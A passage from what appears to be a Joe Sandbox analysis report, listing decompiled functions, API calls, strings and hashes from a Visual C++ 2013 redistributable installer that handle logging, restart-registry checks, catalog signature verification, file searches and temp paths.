0x012af76b
0x012af771
0x012af778
0x012af783
0x012af788
0x012af788
0x012af7a7
0x012af7a9
0x012af7af
0x012af7af
0x012af7cb
0x012af7d9
0x012af7e1
0x012af7e6
0x012af7ec
0x012af7f3
0x012af7f4
0x012af7f5
0x012af7fa
0x012af803
0x012af807
0x012af808
0x012af811
0x012af815
0x012af823
0x012af835
0x012af83a
0x012af842
0x012af844
0x012af872
0x012af846
0x012af846
0x012af847
0x012af86a
0x012af849
0x012af849
0x012af84a
0x012af862
0x012af84c
0x012af84c
0x012af84d
0x012af85a
0x012af84f
0x012af850
0x012af852
0x012af852
0x012af850
0x012af84d
0x012af84a
0x012af847
0x012af87f
0x012af88d
0x012af88e
0x012af88f
0x012af890
0x012af898
0x012af898
0x012af8aa
0x012af7cd
0x012af7cd
0x012af7d3
0x012af7d3
0x012af7d5
0x012af7d6
0x012af7d6
0x012af7d6
0x00000000
0x012af7d3

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,012D5D9C), ref: 012AF76B
_memset.LIBCMT ref: 012AF783
GetComputerNameW.KERNEL32 ref: 012AF7C3

Strings

Executable: %ls v%d.%d.%d.%d, xrefs: 012AF81D
Computer : %ls, xrefs: 012AF82F
--- logging level: %hs ---, xrefs: 012AF879
=== Logging started: %ls ===, xrefs: 012AF7EC

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Name$ComputerFileModule_memset
String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
API String ID: 1941974936-3153207428
Opcode ID: ae974a10f2b21d0ce690b5aed566d4c054c969dc06239a0665ffec2831b07ed8
Instruction ID: 24225acf72ef8463cb236de184870364a7d30ff1eaa93ff79abb322cb318c6a6
Opcode Fuzzy Hash: ae974a10f2b21d0ce690b5aed566d4c054c969dc06239a0665ffec2831b07ed8
Instruction Fuzzy Hash: 3F4182B2D21229AFCB21AF55DD84AEE77BCEB44300F9041A5E605E3151D734AA858FA8

Uniqueness

Uniqueness Score: -1.00%

Function 0128568B Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 120
registryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0128568B(intOrPtr _a4, intOrPtr* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				void* _t46;
				void* _t48;
				void* _t50;
				intOrPtr* _t53;
				void* _t61;
				void* _t65;
				void* _t66;

				_t67 = _a4;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				if(E012B177A( &_v16, L"%ls.RebootRequired",  *((intOrPtr*)(_a4 + 0x50))) >= 0) {
					if(E012B378B( *((intOrPtr*)(_t67 + 0x4c)), _v16, 1,  &_v12) < 0) {
						_t65 = E012B378B( *((intOrPtr*)(_t67 + 0x4c)),  *((intOrPtr*)(_t67 + 0x50)), 1,  &_v8);
						if(_t65 == 0x80070002 || _t65 == 0x80070003) {
							_t66 = 0;
							 *_a8 = 0;
							goto L24;
						} else {
							if(_t65 >= 0) {
								_t66 = E012B359D(_t61, _v8, L"Resume",  &_v20);
								if(_t66 != 0x80070002) {
									if(_t66 >= 0) {
										_t46 = _v20 - 1;
										if(_t46 == 0) {
											 *_a8 = 2;
										} else {
											_t48 = _t46 - 1;
											if(_t48 == 0) {
												 *_a8 = 5;
											} else {
												_t50 = _t48 - 1;
												if(_t50 == 0) {
													 *_a8 = 6;
												} else {
													_t53 = _a8;
													if(_t50 == 1) {
														 *_t53 = 4;
													} else {
														 *_t53 = 1;
													}
												}
											}
										}
										goto L24;
									}
									_push("Failed to read Resume value.");
									goto L13;
								}
								 *_a8 = 1;
								goto L10;
							} else {
								_push("Failed to open registration key.");
								goto L13;
							}
						}
					} else {
						 *_a8 = 3;
						L10:
						_t66 = 0;
						goto L24;
					}
				} else {
					_push("Failed to format pending restart registry key to read.");
					L13:
					_push(_t66);
					E012AFA86();
					L24:
					if(_v8 != 0) {
						RegCloseKey(_v8);
						_v8 = 0;
					}
					if(_v12 != 0) {
						RegCloseKey(_v12);
						_v12 = 0;
					}
					if(_v16 != 0) {
						E012B01E8(_v16);
					}
					return _t66;
				}
			}

0x01285693
0x012856a5
0x012856a8
0x012856ab
0x012856ae
0x012856bd
0x012856db
0x012856f8
0x01285701
0x0128578f
0x01285791
0x00000000
0x0128570f
0x01285711
0x0128572b
0x0128572f
0x0128573c
0x01285750
0x01285751
0x01285784
0x01285753
0x01285753
0x01285754
0x01285779
0x01285756
0x01285756
0x01285757
0x0128576e
0x01285759
0x0128575a
0x0128575d
0x01285763
0x0128575f
0x0128575f
0x0128575f
0x0128575d
0x01285757
0x01285754
0x00000000
0x01285751
0x0128573e
0x00000000
0x0128573e
0x01285734
0x00000000
0x01285713
0x01285713
0x00000000
0x01285713
0x01285711
0x012856dd
0x012856e0
0x01285736
0x01285736
0x00000000
0x01285736
0x012856bf
0x012856bf
0x01285743
0x01285743
0x01285744
0x01285793
0x0128579e
0x012857a3
0x012857a5
0x012857a5
0x012857ab
0x012857b0
0x012857b2
0x012857b2
0x012857b8
0x012857bd
0x012857bd
0x012857c8
0x012857c8

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,00000000,00000001,?,000000F9,00000001,?,00000105,00000000,?,?), ref: 012857A3
RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,00000000,00000001,?,000000F9,00000001,?,00000105,00000000,?,?), ref: 012857B0

Strings

Failed to read Resume value., xrefs: 0128573E
Failed to open registration key., xrefs: 01285713
Failed to format pending restart registry key to read., xrefs: 012856BF
%ls.RebootRequired, xrefs: 0128569F
Resume, xrefs: 0128571E

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: 2deadf3019a33b67cbce90d1f919d79c297f17f87a8f8f6690e305141761c731
Instruction ID: 2dd6421f32502ae2b1853657b07bcaae2668f00a59871986da51068961f701ab
Opcode Fuzzy Hash: 2deadf3019a33b67cbce90d1f919d79c297f17f87a8f8f6690e305141761c731
Instruction Fuzzy Hash: B241B179931209EFDB15FF98C8C1AAEBBB5FB44354F45C06AE615A7290C7B49A008B50

Uniqueness

Uniqueness Score: -1.00%

Function 01283D13 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E01283D13(intOrPtr __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				void* _t33;
				signed int _t34;
				WCHAR** _t42;
				void* _t46;
				signed int _t47;
				void* _t50;

				_t46 = __edx;
				_t43 = __ecx;
				_t47 = 0;
				_v8 = 0;
				_v16 = 0;
				if( *((intOrPtr*)(_a4 + 4)) > 0) {
					_v12 = 0;
					while(1) {
						_t50 =  *_a4 + _v12;
						_t9 = _t50 + 4; // 0x15ff3675
						_t47 = E01284D1E(_t43, _a8,  *_t9,  &_v8);
						if(_t47 < 0) {
							break;
						}
						_t12 = _v8 + 0x50; // 0x390002d6
						_t13 = _t50 + 8; // 0x128222a
						_t42 = _t13;
						_t47 = E012B1171(_t43, _t46, _t42,  *_t12, 0);
						if(_t47 < 0) {
							_push("Failed to get catalog local file path");
							L10:
							_push(_t47);
							E012AFA86();
						} else {
							_t33 = CreateFileW( *_t42, 0x80000000, 5, 0, 3, 0x8000000, 0);
							 *(_t50 + 0xc) = _t33;
							if(_t33 == 0xffffffff) {
								_t34 = GetLastError();
								if(_t34 > 0) {
									_t34 = _t34 & 0x0000ffff | 0x80070000;
								}
								_t47 = _t34;
								if(_t47 >= 0) {
									_t47 = 0x80004005;
								}
								E012B294E(_t34, "catalog.cpp", 0x7e, _t47);
								_t23 = _t50 + 8; // 0x12ba224
								_push( *_t23);
								_push("Failed to open catalog in working path: %ls");
								goto L17;
							} else {
								_t47 = E01298A1A(_t46, _v8,  *_t42, _t33);
								if(_t47 < 0) {
									_t24 = _t50 + 8; // 0x12ba224
									_push( *_t24);
									_push("Failed to verify catalog signature: %ls");
									L17:
									_push(_t47);
									E012AFA86();
								} else {
									_v16 = _v16 + 1;
									_t43 = _v16;
									_v12 = _v12 + 0x10;
									if(_v16 <  *((intOrPtr*)(_a4 + 4))) {
										continue;
									} else {
									}
								}
							}
						}
						goto L19;
					}
					_push("Failed to find payload for catalog file.");
					goto L10;
				}
				L19:
				return _t47;
			}

0x01283d13
0x01283d13
0x01283d1d
0x01283d1f
0x01283d22
0x01283d28
0x01283d2f
0x01283d33
0x01283d38
0x01283d3f
0x01283d4a
0x01283d4e
0x00000000
0x00000000
0x01283d55
0x01283d58
0x01283d58
0x01283d61
0x01283d65
0x01283db5
0x01283dba
0x01283dba
0x01283dbb
0x01283d67
0x01283d7b
0x01283d81
0x01283d87
0x01283dc4
0x01283dcc
0x01283dd3
0x01283dd3
0x01283dd8
0x01283ddc
0x01283dde
0x01283dde
0x01283deb
0x01283df0
0x01283df0
0x01283df3
0x00000000
0x01283d89
0x01283d94
0x01283d98
0x01283dfa
0x01283dfa
0x01283dfd
0x01283e02
0x01283e02
0x01283e03
0x01283d9a
0x01283d9a
0x01283da0
0x01283da3
0x01283daa
0x00000000
0x00000000
0x01283dac
0x01283daa
0x01283d98
0x01283d87
0x00000000
0x01283e0c
0x01283dae
0x00000000
0x01283dae
0x01283e0d
0x01283e11

APIs

Part of subcall function 01284D1E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,00000000,00000000,?,?,?,0128F152,?,?,?,?), ref: 01284D43

CreateFileW.KERNEL32(0128222A,80000000,00000005,00000000,00000003,08000000,00000000,0128222A,390002D6,00000000,01281E8E,15FF3675,01281F0E,01281AAE,01281E22,00000000), ref: 01283D7B

Part of subcall function 01298A1A: _memset.LIBCMT ref: 01298A74

GetLastError.KERNEL32 ref: 01283DC4

Strings

Failed to get catalog local file path, xrefs: 01283DB5
Failed to find payload for catalog file., xrefs: 01283DAE
catalog.cpp, xrefs: 01283DE6
Failed to verify catalog signature: %ls, xrefs: 01283DFD
Failed to open catalog in working path: %ls, xrefs: 01283DF3

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CompareCreateErrorFileLastString_memset
String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
API String ID: 3205693548-48089280
Opcode ID: 7fddfacf57528c3bfc3734e56512a689c396c38363ef7cb6656a398d2adb2b11
Instruction ID: 824be6e5fd3471d016e3c7fb76230cf8ce832eace1844b20ea4aa95e240580aa
Opcode Fuzzy Hash: 7fddfacf57528c3bfc3734e56512a689c396c38363ef7cb6656a398d2adb2b11
Instruction Fuzzy Hash: 53310536561606FFCB21EF59CC81FAEBBB5BF84B50F204019EA15AB2D0D6B1E9018B40

Uniqueness

Uniqueness Score: -1.00%

Function 012A493F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 91
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E012A493F(void* __eax, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v28;
				char _v32;
				char _v36;
				void* __ebx;
				void* __esi;
				void* _t72;
				char _t76;
				void* _t77;
				void* _t78;

				_t72 = __edx;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t78 = __eax;
				WaitForSingleObject( *(__eax + 0xc), 0xffffffff);
				asm("cdq");
				_v5 = ( *( *((intOrPtr*)(_t78 + 0x10)) + 0x219) & 0x000000ff) + ( *( *((intOrPtr*)(_t78 + 0x10)) + 0x218) & 0x000000ff) - _t72 >> 1;
				ReleaseMutex( *(_t78 + 0xc));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t76 = 2;
				_push(_a8);
				_v36 = _t76;
				_v32 = 1;
				_v28 = (_v5 & 0x000000ff) * 0x64 / 0xff;
				_push( &_v36);
				if(_a4() == _t76) {
					WaitForSingleObject( *(_t78 + 0xc), 0xffffffff);
					 *((char*)( *((intOrPtr*)(_t78 + 0x10)) + 2)) = 1;
					 *((char*)( *((intOrPtr*)(_t78 + 0x10)) + 3)) = 1;
					ReleaseMutex( *(_t78 + 0xc));
					SetEvent( *(_t78 + 8));
				}
				_t77 = E012A47B9( &_v16,  &_v12, 0xff, _t78,  &_v20);
				if(_t77 >= 0) {
					__eflags = _v16 - 0x1070001;
					if(__eflags == 0) {
						_t77 = E012A485C(_t78, __eflags, _v12, _a4, _a8);
						__eflags = _t77;
						if(_t77 < 0) {
							_push("Failed to send files in use message from netfx chainer.");
							goto L7;
						}
					}
				} else {
					_push("Failed to get message from netfx chainer.");
					L7:
					_push(_t77);
					E012AFA86();
				}
				if(_v12 != 0) {
					E012B24F6(_v12);
				}
				return _t77;
			}

0x012a493f
0x012a4945
0x012a4949
0x012a4956
0x012a495d
0x012a4975
0x012a497a
0x012a497d
0x012a4988
0x012a4989
0x012a498a
0x012a498b
0x012a499e
0x012a499f
0x012a49a2
0x012a49a5
0x012a49ac
0x012a49b2
0x012a49b8
0x012a49bf
0x012a49c4
0x012a49cb
0x012a49d2
0x012a49db
0x012a49db
0x012a49f0
0x012a49f4
0x012a49fd
0x012a4a04
0x012a4a16
0x012a4a18
0x012a4a1a
0x012a4a1c
0x00000000
0x012a4a1c
0x012a4a1a
0x012a49f6
0x012a49f6
0x012a4a21
0x012a4a21
0x012a4a22
0x012a4a28
0x012a4a2d
0x012a4a32
0x012a4a32
0x012a4a3d

APIs

WaitForSingleObject.KERNEL32(?,000000FF,76CDF730,?,00000000), ref: 012A495D
ReleaseMutex.KERNEL32(?), ref: 012A497D
WaitForSingleObject.KERNEL32(?,000000FF), ref: 012A49BF
ReleaseMutex.KERNEL32(?), ref: 012A49D2
SetEvent.KERNEL32(?), ref: 012A49DB

Strings

Failed to get message from netfx chainer., xrefs: 012A49F6
Failed to send files in use message from netfx chainer., xrefs: 012A4A1C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: MutexObjectReleaseSingleWait$Event
String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
API String ID: 2608678126-3424578679
Opcode ID: 8a75e9ab76bbc8a318cc983ea99ab0199b681ed5bf52d2ee1fc24b2768ff1ff4
Instruction ID: 8104895644895fa6a9662901df6913daf2dbe7c4aef9691c2b00a419e70e2e45
Opcode Fuzzy Hash: 8a75e9ab76bbc8a318cc983ea99ab0199b681ed5bf52d2ee1fc24b2768ff1ff4
Instruction Fuzzy Hash: AB313931510245BFCF129BA9CC48EEDFFB1EF48320F148229E565A6161C775E545CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012874DD Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E012874DD(void* __ecx, intOrPtr* __edi, intOrPtr _a4) {
				signed int _v8;
				signed char _t18;
				signed int _t25;
				intOrPtr* _t30;
				signed int _t33;

				_t30 = __edi;
				_v8 = _v8 & 0x00000000;
				if(E01288C14(_a4,  *((intOrPtr*)(__edi + 0x14)),  &_v8, 0) >= 0) {
					_t18 = GetFileAttributesW(_v8);
					if(_t18 != 0xffffffff) {
						if((_t18 & 0x00000010) == 0) {
							_t33 = 0x80070003;
							L11:
							if(_t33 == 0x80070002 || _t33 == 0x80070003) {
								_push(_t33);
								_push(_v8);
								E012AF6A2(2, "Directory search: %ls, did not find path: %ls, reason: 0x%x",  *_t30);
								_t33 = 0;
							} else {
								if(_t33 < 0) {
									_push(_v8);
									E012AFA86(_t33, "Failed while searching directory search: %ls, for path: %ls",  *_t30);
								}
							}
							goto L16;
						}
						_t33 = E0128A734(_a4,  *((intOrPtr*)(__edi + 4)), _v8, 0);
						if(_t33 >= 0) {
							goto L11;
						}
						_push("Failed to set directory search path variable.");
						goto L9;
					}
					_t25 = GetLastError();
					if(_t25 > 0) {
						_t25 = _t25 & 0x0000ffff | 0x80070000;
					}
					_t33 = _t25;
					goto L11;
				} else {
					_push("Failed to format variable string.");
					L9:
					_push(_t33);
					E012AFA86();
					L16:
					if(_v8 != 0) {
						E012B01E8(_v8);
					}
					return _t33;
				}
			}

0x012874dd
0x012874e1
0x012874fb
0x01287507
0x01287510
0x0128752c
0x01287553
0x01287558
0x0128755e
0x01287581
0x01287582
0x0128758e
0x01287596
0x01287568
0x0128756a
0x0128756c
0x01287577
0x0128757c
0x0128756a
0x00000000
0x0128755e
0x0128753e
0x01287542
0x00000000
0x00000000
0x01287544
0x00000000
0x01287544
0x01287512
0x0128751a
0x01287521
0x01287521
0x01287526
0x00000000
0x012874fd
0x012874fd
0x01287549
0x01287549
0x0128754a
0x01287598
0x0128759c
0x012875a1
0x012875a1
0x012875aa
0x012875aa

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 012874F2
GetFileAttributesW.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,?,01288B81,?,?,?), ref: 01287507
GetLastError.KERNEL32(?,01288B81,?,?,?), ref: 01287512

Strings

Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 01287587
Failed to set directory search path variable., xrefs: 01287544
Failed while searching directory search: %ls, for path: %ls, xrefs: 01287571
Failed to format variable string., xrefs: 012874FD

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-2966038646
Opcode ID: a4a560b837a59bc2e889d1a3ec95c557e2026f017ae09418e081693b726f4715
Instruction ID: eb3a58c60db739603c26eab1909f9d392cb12a701b6137e2aabd92b21aabd554
Opcode Fuzzy Hash: a4a560b837a59bc2e889d1a3ec95c557e2026f017ae09418e081693b726f4715
Instruction Fuzzy Hash: 022123329B2252FBDB233698ED42BED7A249F10360F300124EE04761D0D36D9A10A7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0128773F Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0128773F(void* __ecx, intOrPtr* __edi, intOrPtr _a4) {
				signed int _v8;
				signed char _t18;
				signed int _t25;
				intOrPtr* _t30;
				signed int _t33;

				_t30 = __edi;
				_v8 = _v8 & 0x00000000;
				if(E01288C14(_a4,  *((intOrPtr*)(__edi + 0x14)),  &_v8, 0) >= 0) {
					_t18 = GetFileAttributesW(_v8);
					if(_t18 != 0xffffffff) {
						if((_t18 & 0x00000010) != 0) {
							L14:
							_push(_v8);
							E012AF6A2(2, "File search: %ls, did not find path: %ls",  *_t30);
							_t33 = 0;
							L15:
							if(_v8 != 0) {
								E012B01E8(_v8);
							}
							return _t33;
						}
						_t33 = E0128A734(_a4,  *((intOrPtr*)(__edi + 4)), _v8, 0);
						if(_t33 >= 0) {
							L6:
							if(_t33 == 0x80070002 || _t33 == 0x80070003) {
								goto L14;
							} else {
								if(_t33 < 0) {
									_push(_v8);
									E012AFA86(_t33, "Failed while searching file search: %ls, for path: %ls",  *_t30);
								}
								goto L15;
							}
						}
						_push("Failed to set variable to file search path.");
						L13:
						_push(_t33);
						E012AFA86();
						goto L15;
					}
					_t25 = GetLastError();
					if(_t25 > 0) {
						_t25 = _t25 & 0x0000ffff | 0x80070000;
					}
					_t33 = _t25;
					goto L6;
				}
				_push("Failed to format variable string.");
				goto L13;
			}

0x0128773f
0x01287743
0x0128775d
0x01287769
0x01287772
0x012877b5
0x012877dc
0x012877dc
0x012877e8
0x012877f0
0x012877f2
0x012877f6
0x012877fb
0x012877fb
0x01287804
0x01287804
0x012877c7
0x012877cb
0x0128778a
0x01287790
0x00000000
0x0128779a
0x0128779c
0x0128779e
0x012877a9
0x012877ae
0x00000000
0x0128779c
0x01287790
0x012877cd
0x012877d2
0x012877d2
0x012877d3
0x00000000
0x012877d9
0x01287774
0x0128777c
0x01287783
0x01287783
0x01287788
0x00000000
0x01287788
0x0128775f
0x00000000

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 01287754
GetFileAttributesW.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,?,01288B5E,?,?,?), ref: 01287769
GetLastError.KERNEL32(?,01288B5E,?,?,?), ref: 01287774

Strings

Failed to set variable to file search path., xrefs: 012877CD
File search: %ls, did not find path: %ls, xrefs: 012877E1
Failed while searching file search: %ls, for path: %ls, xrefs: 012877A3
Failed to format variable string., xrefs: 0128775F

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
API String ID: 1811509786-3425311760
Opcode ID: b04db80c41e61ab92c1281dba45579be31bcb6ab23280e36135d705f59263988
Instruction ID: ba3a507eaa447bceddde18712c30692ce9d39f685386739f9ea54e0704febbb8
Opcode Fuzzy Hash: b04db80c41e61ab92c1281dba45579be31bcb6ab23280e36135d705f59263988
Instruction Fuzzy Hash: 09112432972123BBEB277694CE42BED7E24DF14760F704110EA00621D1D7799E50E7C1

Uniqueness

Uniqueness Score: -1.00%

Function 01297654 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01297654(void* __ebx, void* __ecx, void* __edx, void* __edi) {
				signed int _v8;
				short _v528;
				void* __esi;
				signed int _t6;
				signed int _t17;
				void* _t20;
				void* _t26;
				void* _t28;
				signed int _t29;
				signed int _t30;

				_t27 = __edi;
				_t26 = __edx;
				_t20 = __ebx;
				_t6 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t6 ^ _t30;
				_t28 = __ecx;
				E012A7E30( &_v528, 0, 0x208);
				if(GetTempPathW(0x104,  &_v528) != 0) {
					_push(_t28);
					_t29 = E012B177A(__edi, L"%ls%ls\\",  &_v528);
					if(_t29 < 0) {
						_push("Failed to append bundle id on to temp path for working folder.");
						goto L8;
					}
				} else {
					_t17 = GetLastError();
					if(_t17 > 0) {
						_t17 = _t17 & 0x0000ffff | 0x80070000;
					}
					_t29 = _t17;
					if(_t29 >= 0) {
						_t29 = 0x80004005;
					}
					E012B294E(_t17, "cache.cpp", 0x433, _t29);
					_push("Failed to get temp path for working folder.");
					L8:
					_push(_t29);
					E012AFA86();
				}
				return E012A7EAA(_t29, _t20, _v8 ^ _t30, _t26, _t27, _t29);
			}

0x01297654
0x01297654
0x01297654
0x0129765d
0x01297664
0x01297676
0x01297678
0x01297694
0x012976cc
0x012976df
0x012976e6
0x012976e8
0x00000000
0x012976e8
0x01297696
0x01297696
0x0129769e
0x012976a5
0x012976a5
0x012976aa
0x012976ae
0x012976b0
0x012976b0
0x012976c0
0x012976c5
0x012976ed
0x012976ed
0x012976ee
0x012976f4
0x01297703

APIs

_memset.LIBCMT ref: 01297678
GetTempPathW.KERNEL32(00000104,?,?,?,?), ref: 0129768C
GetLastError.KERNEL32(?,?,?), ref: 01297696

Strings

%ls%ls\, xrefs: 012976D4
Failed to get temp path for working folder., xrefs: 012976C5
cache.cpp, xrefs: 012976BB
Failed to append bundle id on to temp path for working folder., xrefs: 012976E8

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLastPathTemp_memset
String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to get temp path for working folder.$cache.cpp
API String ID: 623060366-3390808230
Opcode ID: 6fedb409d772477584e54d392f535c88896d45799d0b3f41be9bbaef5188e1de
Instruction ID: 515e99e3a88a06d4fa6d80e92d37a6f3120d8b5f899b52014c98ce11f444a356
Opcode Fuzzy Hash: 6fedb409d772477584e54d392f535c88896d45799d0b3f41be9bbaef5188e1de
Instruction Fuzzy Hash: D601FE71A713166BD720A76CAC4AFBA37989F00B50F10026CEE04F7241FAA59E044BD4

Uniqueness

Uniqueness Score: -1.00%

Function 0128C1E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0128C1E0(void* __ecx, void* _a4) {
				long _v8;
				signed int _t18;
				signed int _t22;

				_v8 = _v8 & 0x00000000;
				if(WaitForSingleObject(_a4, 0xffffffff) == 0) {
					if(GetExitCodeThread(_a4,  &_v8) == 0) {
						_t18 = GetLastError();
						if(_t18 > 0) {
							_t18 = _t18 & 0x0000ffff | 0x80070000;
						}
						_v8 = _t18;
						if(_t18 >= 0) {
							_v8 = 0x80004005;
						}
						E012B294E(_t18, "core.cpp", 0x5a6, _v8);
						_push("Failed to get cache thread exit code.");
						goto L12;
					}
				} else {
					_t22 = GetLastError();
					if(_t22 > 0) {
						_t22 = _t22 & 0x0000ffff | 0x80070000;
					}
					_v8 = _t22;
					if(_t22 >= 0) {
						_v8 = 0x80004005;
					}
					E012B294E(_t22, "core.cpp", 0x5a1, _v8);
					_push("Failed to wait for cache thread to terminate.");
					L12:
					_push(_v8);
					E012AFA86();
				}
				return _v8;
			}

0x0128c1e4
0x0128c1f5
0x0128c241
0x0128c243
0x0128c24b
0x0128c252
0x0128c252
0x0128c257
0x0128c25c
0x0128c25e
0x0128c25e
0x0128c272
0x0128c277
0x00000000
0x0128c277
0x0128c1f7
0x0128c1f7
0x0128c1ff
0x0128c206
0x0128c206
0x0128c20b
0x0128c210
0x0128c212
0x0128c212
0x0128c226
0x0128c22b
0x0128c27c
0x0128c27c
